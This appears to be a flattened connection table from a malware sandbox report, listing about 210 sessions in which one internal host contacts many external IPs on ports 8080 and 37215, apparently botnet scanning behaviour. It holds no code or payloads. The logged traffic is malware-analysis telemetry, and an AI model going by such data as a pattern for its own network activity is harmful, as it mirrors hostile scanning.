                                                        30847192.168.2.2341130188.60.176.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30848192.168.2.2347394122.152.193.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30849192.168.2.2343532223.18.108.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30850192.168.2.2347184114.219.194.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30851192.168.2.2335964182.79.208.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30852192.168.2.23418309.149.16.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30853192.168.2.234763868.101.87.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30854192.168.2.236047617.3.189.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30855192.168.2.2339044119.147.239.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30856192.168.2.2354440124.144.144.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30857192.168.2.2334518182.49.66.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30858192.168.2.235794431.212.212.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30859192.168.2.234821441.54.238.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30860192.168.2.2347186196.55.158.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30861192.168.2.2352060190.92.193.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30862192.168.2.2352190116.61.229.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30863192.168.2.2344070152.213.53.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30864192.168.2.234311047.118.224.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30865192.168.2.2339786145.191.1.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30866192.168.2.2360110222.174.88.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30867192.168.2.23519442.120.97.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30868192.168.2.2333680178.156.247.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30869192.168.2.2335836196.208.46.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30870192.168.2.233975298.205.3.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30871192.168.2.2338640183.222.204.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30872192.168.2.2338234125.162.130.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30873192.168.2.2334972103.1.221.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30874192.168.2.2339964177.95.39.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30875192.168.2.235678296.8.199.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30876192.168.2.23405301.190.53.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30877192.168.2.2349478134.136.182.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30878192.168.2.2348270138.190.193.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30879192.168.2.235156068.25.199.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30880192.168.2.2333758222.34.32.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30881192.168.2.2338210177.37.103.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30882192.168.2.2360726219.235.128.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30883192.168.2.2356616125.160.233.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30884192.168.2.2357276142.74.53.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30885192.168.2.2344956145.217.17.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30886192.168.2.2346274136.101.250.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30887192.168.2.236062647.221.44.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30888192.168.2.2355936192.254.224.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30889192.168.2.2345288109.193.41.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30890192.168.2.235485843.239.231.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30891192.168.2.2341232223.23.205.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30892192.168.2.233754449.158.76.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30893192.168.2.2350196143.93.225.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30894192.168.2.2333182109.82.235.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30895192.168.2.2348830145.11.65.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30896192.168.2.2354358168.8.221.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30897192.168.2.235426871.90.44.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30898192.168.2.2352746204.80.86.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30899192.168.2.234224653.66.133.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30900192.168.2.2336630149.182.75.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30901192.168.2.234238641.48.102.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30902192.168.2.2336062218.239.144.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30903192.168.2.235036886.66.77.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30904192.168.2.2336980178.117.112.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30905192.168.2.2344140210.223.61.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30906192.168.2.2346960177.111.6.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30907192.168.2.234699260.159.70.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30908192.168.2.2359522175.23.133.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30909192.168.2.2357346184.236.35.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30910192.168.2.2345042137.180.103.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30911192.168.2.236045680.72.58.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30912192.168.2.234575043.51.93.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30913192.168.2.2332900138.230.5.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30914192.168.2.235272285.83.143.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30915192.168.2.2350276141.248.115.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30916192.168.2.234277814.217.86.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30917192.168.2.2349530206.106.203.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30918192.168.2.23568344.172.229.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30919192.168.2.2353354197.68.46.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30920192.168.2.2334994201.190.218.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30921192.168.2.2358500157.225.233.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30922192.168.2.234961241.210.68.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30923192.168.2.235207641.51.192.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30924192.168.2.2346872157.9.75.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30925192.168.2.233508841.9.242.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30926192.168.2.2340246157.143.216.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30927192.168.2.2351280197.164.111.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30928192.168.2.234382241.20.142.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30929192.168.2.2338680163.198.235.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30930192.168.2.2354266197.159.249.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30931192.168.2.2357282197.49.40.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30932192.168.2.233411041.95.96.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30933192.168.2.2336136197.158.128.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30934192.168.2.234375841.152.58.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30935192.168.2.235504483.97.108.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30936192.168.2.2355398197.89.35.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30937192.168.2.233367041.32.89.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30938192.168.2.2345686197.91.9.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30939192.168.2.2334730157.4.124.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30940192.168.2.234360841.250.191.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30941192.168.2.2345116157.228.202.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30942192.168.2.2357122131.191.196.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30943192.168.2.2345878197.149.230.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30944192.168.2.234208493.193.50.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30945192.168.2.234526241.209.219.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30946192.168.2.235112041.202.40.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30947192.168.2.235004041.146.140.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30948192.168.2.235527641.249.143.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30949192.168.2.2342938206.225.181.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30950192.168.2.2350938112.56.188.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30951192.168.2.2351366157.8.15.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30952192.168.2.2341132157.70.64.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30953192.168.2.2341694157.77.101.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30954192.168.2.2350586197.35.18.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30955192.168.2.2347376197.248.170.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30956192.168.2.2347278169.177.175.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30957192.168.2.2348852166.83.85.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30958192.168.2.235296632.50.205.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30959192.168.2.2354740196.254.94.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30960192.168.2.235831075.207.152.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30961192.168.2.2349092197.47.93.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30962192.168.2.2358034197.11.252.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30963192.168.2.2337270159.75.183.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30964192.168.2.2354802197.66.225.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30965192.168.2.2351610157.9.157.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30966192.168.2.234946818.57.206.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30967192.168.2.236057841.240.8.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30968192.168.2.234316299.201.70.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30969192.168.2.2347360166.198.153.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30970192.168.2.2350784157.140.103.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30971192.168.2.2335074197.61.140.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30972192.168.2.2346152197.25.207.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30973192.168.2.2351834157.175.2.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30974192.168.2.2335710197.23.72.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30975192.168.2.234455441.235.101.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30976192.168.2.2335204197.239.19.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30977192.168.2.2345438157.165.146.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30978192.168.2.233671438.68.38.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30979192.168.2.2355634157.201.96.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30980192.168.2.235967641.251.242.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30981192.168.2.2357596197.184.151.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30982192.168.2.234885241.27.86.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30983192.168.2.233748441.122.179.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30984192.168.2.2342480157.9.177.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30985192.168.2.2332938157.46.152.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30986192.168.2.235939841.7.177.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30987192.168.2.2350574197.189.44.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30988192.168.2.2346196197.238.253.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30989192.168.2.233507441.229.31.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30990192.168.2.2340366157.115.227.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30991192.168.2.2335432192.174.20.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30992192.168.2.2338682138.195.87.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30993192.168.2.235753872.199.108.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30994192.168.2.234210841.58.166.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30995192.168.2.2357128157.87.40.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30996192.168.2.2355550157.57.17.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30997192.168.2.233957641.197.78.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30998192.168.2.2334372197.208.58.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30999192.168.2.2332872197.187.133.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31000192.168.2.233831241.154.208.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31001192.168.2.2339296157.158.71.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31002192.168.2.2351230175.69.75.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31003192.168.2.2357674126.57.24.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31004192.168.2.234042641.179.226.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31005192.168.2.2358784197.158.157.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31006192.168.2.234913041.144.157.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31007192.168.2.2343948197.158.214.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31008192.168.2.2352660157.237.84.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31009192.168.2.233524441.51.101.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31010192.168.2.2357118209.4.238.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31011192.168.2.2359300157.130.125.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31012192.168.2.2348666172.237.225.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31013192.168.2.2338392157.172.56.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31014192.168.2.234009241.231.242.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31015192.168.2.2358654197.227.194.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31016192.168.2.2354558157.171.239.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31017192.168.2.2351204157.93.141.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31018192.168.2.235253061.245.176.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31019192.168.2.2359216197.250.238.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31020192.168.2.2353918197.231.48.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31021192.168.2.2342802178.50.31.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31022192.168.2.2337122157.82.140.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31023192.168.2.2342278157.39.32.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31024192.168.2.234953041.235.228.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31025192.168.2.236062241.242.151.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31026192.168.2.236012841.242.53.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31027192.168.2.234258841.238.49.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31028192.168.2.234025890.125.124.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31029192.168.2.235526427.236.183.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31030192.168.2.235658641.19.43.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31031192.168.2.2348636197.92.146.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31032192.168.2.235704857.144.114.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31033192.168.2.2341812157.212.15.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31034192.168.2.233640441.173.228.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31035192.168.2.2334142197.73.78.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31036192.168.2.2333524157.152.237.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31037192.168.2.2341804157.141.21.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31038192.168.2.234041441.122.79.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31039192.168.2.235033649.54.173.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31040192.168.2.2356000157.124.155.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31041192.168.2.235444441.144.8.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31042192.168.2.2335924197.167.147.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31043192.168.2.2340588157.232.238.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31044192.168.2.2345676157.8.212.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31045192.168.2.235441241.188.73.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31046192.168.2.233582841.242.101.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31047192.168.2.234993841.239.175.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31048192.168.2.2358900157.165.87.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31049192.168.2.234984042.241.117.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31050192.168.2.2358806157.243.4.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31051192.168.2.2347150197.118.95.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31052192.168.2.235590041.115.37.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31053192.168.2.2339306197.149.70.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31054192.168.2.2345072197.71.211.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31055192.168.2.2356398103.22.88.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31056192.168.2.2351136197.4.94.18637215
                                                        TimestampBytes transferredDirectionData


